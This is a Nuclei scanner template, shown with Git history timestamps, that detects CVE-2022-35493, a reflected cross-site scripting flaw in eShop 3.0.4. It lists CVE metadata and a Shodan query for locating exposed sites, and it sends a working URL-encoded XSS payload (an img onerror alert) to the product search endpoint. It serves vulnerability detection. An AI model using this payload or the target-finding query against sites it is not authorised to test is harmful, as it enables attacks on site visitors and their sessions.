nuclei-templates/http/cves/2022/CVE-2022-35493.yaml

51 lines
1.9 KiB
YAML
Raw Normal View History

2022-08-09 19:09:47 +00:00
id: CVE-2022-35493
info:
name: eShop 3.0.4 - Cross-Site Scripting
2022-08-09 19:09:47 +00:00
author: arafatansari
severity: medium
2022-08-09 19:09:47 +00:00
description: |
eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website.
2023-09-06 11:59:08 +00:00
remediation: |
To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2022-08-09 19:09:47 +00:00
reference:
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
2022-08-09 19:18:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-35493
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.00133
epss-percentile: 0.48211
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:*
2022-08-09 19:09:47 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: wrteam
product: eshop_-_ecommerce_\/_store_website
2023-09-06 11:59:08 +00:00
shodan-query: http.html:"eShop - Multipurpose Ecommerce"
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,eshop,xss,wrteam
2022-08-09 19:09:47 +00:00
http:
2022-08-09 19:09:47 +00:00
- method: GET
path:
2022-08-09 19:18:12 +00:00
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
2022-08-09 19:09:47 +00:00
matchers-condition: and
matchers:
2022-08-09 19:18:12 +00:00
- type: word
words:
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
2022-08-09 19:09:47 +00:00
- type: word
2022-08-09 19:18:12 +00:00
part: header
2022-08-09 19:09:47 +00:00
words:
2022-08-09 19:18:12 +00:00
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100ec4816ba85ee59bb9a357898fa8eba610778145e88fed494af7d1ce7ad1a7ed3022100ac631c34565d02bd4793297310538fdda70cda0991ee4a52f177cd4f746ed276:922c64590222798bb761d5b6d8e72950